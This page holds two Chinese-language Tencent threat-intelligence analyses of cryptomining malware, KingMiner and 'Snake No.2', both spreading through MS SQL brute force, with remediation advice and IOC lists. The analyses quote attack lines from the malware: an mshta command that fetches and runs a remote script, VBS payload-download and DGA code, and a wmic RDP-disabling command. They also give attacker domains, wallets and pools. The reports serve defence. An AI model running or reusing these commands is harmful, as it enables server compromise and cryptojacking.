标签: SQL爆破

针对 SQL 弱口令的爆破攻击再度袭来,KingMiner 矿工已控制上万台设备

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/ZothuAaH-r1xH6HFUbz–A   一、背景 腾讯安全御见威胁情报中心检测到KingMiner变种攻击,KingMiner是一种针对Windows服务器MS SQL进行爆破攻击的门罗币挖矿木马。该木马最早于2018年6月中旬首次出现,并在随后迅速发布了两个改进版本。攻击者采用了多种逃避技术来绕过虚拟机环境和安全检测,导致一些反病毒引擎无法准确检测。 当前版本KingMiner具有以下特点: 1.针对MSSQL进行爆破攻击入侵; 2.利用WMI定时器和Windows计划任务进行持久化攻击; 3.关闭存在CVE-2019-0708漏洞机器上RDP服务,防止其他挖矿团伙入侵,以独占服务器资源挖矿; 4.使用base64和特定编码的XML、TXT、PNG文件来加密木马程序; 5.利用微软和多个知名厂商的签名文件作为父进程,“白+黑”启动木马DLL。 根据腾讯安全御见威胁情报中心统计数据,KingMiner影响超过一万台电脑,其中受影响最严重的地区为广东、重庆、北京、上海等地。 二、详细分析 KingMiner在MS SQL爆破入侵成功后,首先执行一段VBS脚本(tl.txt/vk.txt),检测操作系统版本,并根据不同的系统版本下载不同的Payload文件,利用下载的文件进行提权以及门罗币挖矿。同时还会安装WMI定时器和Windows计划任务来反复执行指定脚本,执行服务器返回的恶意代码达到持久化攻击的目的。 KingMiner变种攻击流程 提权 vk.txt从http[:]// w.30713fdae.tk/32tl.zip下载经过base64编码的二进制blob文件,经过解码后保存为C:\Users\Public\Downloads\<random>\tool.exe tool.exe利用Windows权限提升漏洞CVE-2019-0803进行攻击,成功利用此漏洞的攻击者可以在内核模式下运行任意代码,然后可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新帐户。 tool.exe在特权模式下执行命令 mshta.exe vbscript:GetObject(\"script:http[:]//aa.30583fdae.tk/r1.txt\")(window.close) 通过mshta.exe执行脚本r1.txt来进行持久化。 持久化 计时器(每15分钟执行一次VBS脚本) r1.txt配置名为WindowsSystemUpdate _WMITimer的计时器,并将执行一段脚本代码的事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate_filter绑定到计时器,从而通过计时器每15分钟执行一次下面的VBS脚本代码: 这段VBS代码根据不同情况采取两种方法生成URL,接着通过访问生成的URL下载第二阶段的Payload运行。 1.URL由IP地址转化为ASCII后拼接而成 脚本运行nslookup命令查询C&C域名news.g23thr.com的DNS记录,当news.g23thr.com解析的IP地址为xxx.xxx.xxx.120,则访问URL “http://”+chr(xxx)+chr(xxx)+chr(xxx)+”xfghh.com/mgxbox.txt” 2.URL由与时间相关的DGA域名拼接而成 当查询DNS返回IP不符合指定格式,则DGA域名通过当前时间的年、月、日、分钟、秒数值计算得到,算法如下: u =(hex((year(now())-2000)&Month(now())&(day(now())\7)&(year(now())-2000)))&"fdae.tk"url = "http://"&minute(now())&second(now())&"."&u&"/mgxbox.txt" 计划任务 r1.txt通过RegisterTaskDefinition创建名为WindowsMonitor的计划任务,每15分钟执行一次如下脚本;或者安装触发条件为系统启动的计划任务WindowsHelper,并在WindowsHelper触发后再次安装WindowsMonitor定时任务执行同一段脚本: 计划任务最终执行的脚本如下: 计划任务执行的VBS脚本与WMITimer执行的脚本类似,通过DNS查询返回的数据,或者获取时间转换后生成的DGA域名拼接URL,执行访问URL后返回的代码。 url=“http://”+chr(xxx)+chr(xxx)+chr(xxx)+”xfghh.com/pow.txt” 或者 u =(hex((year(now())-2000)&Month(now())&(day(now())\7)&(year(now())-2000)))&"fdae.tk"url = "http://"&minute(now())&second(now())&"."&u&"/pow.txt" 当前访问url返回的代码如下: CreateObject("WScript.Shell").Run "cmd /c ver |findstr ""5.0 5.1 5.2 6.0 6.1""&&wmic qfe GET hotfixid |findstr /i ""kb4499175 kb4500331 KB4499149 KB4499180 KB4499164""||wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0",0,False 返回代码的功能为: 获取计算机版本,并判断计算机版本是否受CVE-2019-0708漏洞的影响,且计算机是否安装特定补丁(kb4499175、kb4500331、KB4499149、KB4499180、KB4499164为微软发布的CVE-2019-0708远程桌面服务远程代码执行漏洞的补丁号)。 如果没有安装补丁,则修改设置禁止其他机器通过远程桌面服务访问本机,通过这种方式来阻止其他木马进入系统,从而达到独占挖矿资源的目的。 挖矿 vbs脚本tl.txt从http[:]// w.30713fdae.tk/32a1.zip下载经过base64编码的二进制blob文件。 文件解码并解压后保存至C:\Users\Public\Downloads\<random>\目录下,其中<random>为取当前时间“年月日时分秒”格式生成的字符。 alger.exe为微软系统文件credwiz.exed,功能描述为Credential Backup and Restore Wizard(凭据备份和还原向导),该程序在启动后自动加载系统DLL文件duer.dll并调用其导出函数InitGadgets()。 除了微软系统文件外,KingMiner在挖矿木马的“白+黑”启动过程中还利用了多个知名公司的含数字签名的文件来逃避杀软检测,利用正常的有数字签名的白文件来调用恶意dll。 目前发现的包括以下数字签名的文件被利用: “GuangZhou KuGou Computer Technology Co.,Ltd.” “Google Inc” “福建创意嘉和软件有限公司” 32a1.zip/64a1.zip解压后在同一目录下释放受信任的系统文件alger.exe(credwiz.exed)和恶意的duer.dll,利用alger.exe加载duer.dll并调用其导出的InitGadgets(),从而在InitGadgets()中解密保存在同目录下的x.txt或x/y/z.png中的XMRig挖矿程序代码,并启动门罗币挖矿过程。 三、安全建议 我们建议企业针对KingMiner挖矿木马的技术特点采取针对性的防御措施: 1.根据微软官方公告修复特权提升漏洞CVE-2019-0803: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803 2、加固SQL Server服务器,修补服务器安全漏洞。使用安全的密码策略,使用高强度密码,切勿继续使用弱口令,特别是sa账号密码,防止黑客暴力破解。 3、修改SQL Sever服务默认端口,在原始配置基础上更改默认1433端口设置,并且设置访问规则,拒绝1433端口探测。 4、企业用户可在服务器部署腾讯御点终端安全管理系统,从而防范此类攻击。 5、推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) 腾讯御界检测到针对SQL服务器的爆破攻击 IOCs @KingMiner IP 107.154.161.209 107.154.158.39 Domain q.112adfdae.tk q.30583fdae.tk aa.30583fdae.tk w.30713fdae.tk a.1b051fdae.tk news.g23thr.com a.qwerr.ga w.ddff1.tk Md5 duser.dll 20e502ff977b336d9e7785186b16c68a 78b56b92c2e7a42520fb99a84d78cf92 active_desktop_render_x64.dll 21048ff02894656b5b24d4ed3c8a2882 goopdate.dll 7def058c5d2acb660f394d04b4698580 soundbox.dll 88a5c4645c2a9d0481fd0a846e49b773 64tl.zip be45959bc043a4fe88351cd03289f240 64a1.zip 4d910cb71c2f55bde48521f7ae062da4 32a1.zip 465373b74d163028add70f0d2b0966d0 23ef4da80f6985a78c4a59467ac4612f 32tl.zip e09947875b4722aab067c4d0c4b30384 r1.txt 21cb01553d92bee4fefc0069db1fd5ea c568d6028735cdc2a1ddd3c01f14ca80 tl.txt b0ab674b842822358be8cd5f6dc91554 vk.txt e3accf5a6f58932e56192bfbcbf0804c c874dbb6bf3664990b57d07d7d220ee6 n.txt 2b702a22963448c164db26807a308d50 pow.txt/mgxbox.txt 03d24675d4de12bcd076e7eff213a8a4 htak.txt 5fd47b2be01004e41290bf7658c7ad5a tool.exe 4899762134c0d2d8fbbaecc289a0c74e URL http[:]//4056.309cffdae.tk/vk.txt http[:]//3023.309cffdae.tk/vk.txt http[:]//5311.1d28ebfdae.com/pow.txt http[:]//3843.1d28ebfdae.com/pow.txt http[:]//5921.1d28ebfdae.com/mgxbox.txt http[:]//ww33.3096bfdae.com/32a1.cab http[:]//ww33.3096bfdae.com/64a1.cab http[:]//a.qwerr.ga/32a.zip http[:]//a.qwerr.ga/64f.zip http[:]//aa.30583fdae.tk/r1.txt http[:]//aa.30583fdae.tk/tl.txt http[:]//aa.30583fdae.tk/r1.txt http[:]//q.30583fdae.tk/32tl.zip http[:]//q.30583fdae.tk/64tl.zip http[:]//q.30583fdae.tk/64a1.zip http[:]//q.30583fdae.tk/32a1.zip http[:]//w.30713fdae.tk/vyk.txt http[:]//w.30713fdae.tk/64a1.zip http[:]//w.30713fdae.tk/32a1.zip http[:]//w.ddff1.tk/32a1.zip http[:]//w.ddff1.tk/64a1.zip 矿池: 95.179.131.54:9761 w.homewrt.com:9761 钱包: 49EHNacRauzgz8cGouhrVChcLyF3XrGLAdWiczJxY1qpX3oed4cGgMUUHHhyR7taGJ1MtvpfJiDf9gugAko4MzXM9DRYzZ1 参考链接: https://research.checkpoint.com/2018/kingminer-the-new-and-improved-cryptojacker/

SQL 爆破、提权攻击成惯用伎俩,逾 500台 服务器被黑客控制

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/z3FWK4vqUBGsHwavNOGYIw   一、背景 腾讯安全御见威胁情报中心近期监测到黑产团伙针对MS SQL服务器进行弱口令爆破攻击,攻击成功后再利用多个提权工具进行提权,随后,攻击者会植入门罗币挖矿木马及anydesk远程控制软件长期占有该服务器。 该团伙攻击手法与今年4月曝光的“贪吃蛇”挖矿木马团伙比较类似,病毒挖矿的同时会封堵系统的135,139,445端口,防止已被自己攻占的系统再被其他黑产团伙入侵控制。该病毒团伙尚不能确定归属于“贪吃蛇”挖矿木马团伙,腾讯安全御见威胁情报中心将其命名为“贪吃蛇2号”。 “贪吃蛇2号”木马团伙主要危害MS SQL系统管理员使用弱密码的企业网络,一旦爆破入侵成功,会利用多个提权工具采取进一步的行动。我们的监测数据表明,“贪吃蛇2号”木马团伙已控制超过500台服务器。 腾讯安全专家建议企业网管尽快为服务器安装补丁,并停止使用弱口令,数据库服务器被黑客暴力破解再完全控制会导致企业计算资源被恶意挖矿、企业关键业务信息泄露,入侵者还可能通过这些被控制的服务器继续在内网攻击传播。受害企业可使用腾讯御点终端安全防护系统或腾讯电脑管家拦截清除此类病毒。 二、详细分析 黑客通过MS SQL爆破入侵服务器,入侵成功后第一个步骤就是提权,提权工具被放置在TQ.exe的资源中,共6个提权工具,分别用了2015年-2018年的典型提权漏洞,涵盖Windows Vista至Windows 10系统及Windows Server系统。 提权工具:MS15.exe WIN8.1提权漏洞,该漏洞是2014年9月30号google报给微软的,漏洞发生在chcache.sys驱动NtApphelpCacheControl函数,2015年1月公开POC。 提权工具:MS16_32.exe 2016年的提权工具,利用漏洞编号CVE-2016-0099 受影响系统 Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1 Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1 Windows 10 Gold 提权工具:MS17.exe 利用COM组件权限许可和访问控制漏洞,漏洞公布时间为2017年5月17日,漏洞编号CVE-2017-0213 受影响系统: Microsoft Windows Server 2016 0 Microsoft Windows Server 2012 R2 0 Microsoft Windows Server 2012 0 Microsoft Windows Server 2008 R2 for x64-based Systems SP1 Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 Microsoft Windows Server 2008 for x64-based Systems SP2 Microsoft Windows Server 2008 for Itanium-based Systems SP2 Microsoft Windows Server 2008 for 32-bit Systems SP2 Microsoft Windows RT 8.1 Microsoft Windows 8.1 for x64-based Systems 0 Microsoft Windows 8.1 for 32-bit Systems 0 Microsoft Windows 7 for x64-based Systems SP1 Microsoft Windows 7 for 32-bit Systems SP1 Microsoft Windows 10 version 1703 for x64-based Systems 0 Microsoft Windows 10 version 1703 for 32-bit Systems 0 Microsoft Windows 10 Version 1607 for x64-based Systems 0 Microsoft Windows 10 Version 1607 for 32-bit Systems 0 Microsoft Windows 10 version 1511 for x64-based Systems 0 Microsoft Windows 10 version 1511 for 32-bit Systems 0 Microsoft Windows 10 for x64-based Systems 0 提权工具:MS18_32.exe 2018年的内核提权漏洞,部分Windows系统win32k.sys组件的NtUserSetImeInfoEx系统函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码。 受影响系统: Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for Itanium-Based Systems ServicePack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for Itanium-Based Systems ServicePack 1 Windows Server 2008 R2 for x64-based Systems ServicePack 1 提权工具:JuicyPotato TQ失败后,则会下载新的提权工具JuicyPotato,JuicyPotato是windows平台上的一个综合提权包,主要通过拦截加载COM组件加载前后的NTLM认证数据包进行攻击。 黑客启用的HFS服务器: EW.exe是著名的内网穿透工具Earthworm,主要做内网上线用,Lcx是内网端口转发工具,scan是一个端口扫描工具,配合Earthworm使用。 2019-5.exe是一个自解压文件,包含远控工具,进程管理,挖矿组件等,解压密码bing,目录列表: Kill.exe及PH64.Exe是进程管理工具,两者都属于内核级的进程管理工具,用以结束一些反病毒工具的进程,待结束的进程列表: 挖矿组件: 1_64N中包含了挖矿组件,使用了NSSM服务模块启动挖矿程序 服务名Networks 钱包: 438uqHTH7gqPfSBJhxpELTFqgafi4y48FJroP7MQ5r9DdvJqyMXnqWGa9YqtDiHueo3HnpRygtfEsc4EqQdrS1Y1EJpKBS9.AAA 矿池(私有矿池) p1.local.xmrrr.com:80 2_crontab.exe负责写入计划任务 计划任务名为“Windows Update“,名字具有较强迷惑性,正常的Windows Update不是以计划任务形式启动的,而是以服务形式启动。 木马入侵成功后会尝试关闭掉本机一些不必要的端口,防止已被自己攻占的系统再被其他黑产团伙入侵控制。 最终会在本机安装anydesk远控工具,并接收黑客的远程控制。 三、安全建议 1、加固SQL Server服务器,修补服务器安全漏洞。使用安全的密码策略,使用高强度密码,切勿使用弱口令,特别是sa账号密码,防止黑客暴力破解。 2、修改SQL Sever服务默认端口,在原始配置基础上更改默认1433端口设置,并且设置访问规则,拒绝1433端口探测。 3、企业用户可在服务器部署腾讯御点终端及时对服务器打补丁,防止这类木马利用windows提权漏洞,从而防范此类攻击。 对于已经中毒的企业和个人用户,除了使用杀毒软件清理此病毒外,还可做以下操作手动删除: 删除文件 c:\windows\fonts\system32\taskhsot.exe c:\windows\fonts\system32\svchost.exe c:\windows\fonts\system32\jbeta.bat c:\windows\fonts\system32\cmd.bat C:\windows\fonts\system.bat C:\\Windows\\reg\\smss.exe 删除注册表: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 删除计划任务 Windows Update IOCs url hxxp://220.125.217.130:1231/ 钱包 438uqHTH7gqPfSBJhxpELTFqgafi4y48FJroP7MQ5r9DdvJqyMXnqWGa9YqtDiHueo3HnpRygtfEsc4EqQdrS1Y1EJpKBS9.AAA MD5 aa6e101b549aa8f96b180142bef8700b d350bb49096e00c4e6de567614fdc590 d76e1525c8998795867a17ed33573552 89909ce04d28fa31ed9095116e4635c5 6afe1d47d90f1687a3053ebeaf06e8b8 8ccf1623d36136e51b2f282f0ee0ba1b 036f82700b985d8a50b2f60c98ab9d77 5b4fa0e875703efdba091706321951eb c5cb6e274c71243c084556b24eab9241 参考链接 https://mp.weixin.qq.com/s/3J84msMXXH8PPc-J0w8FPA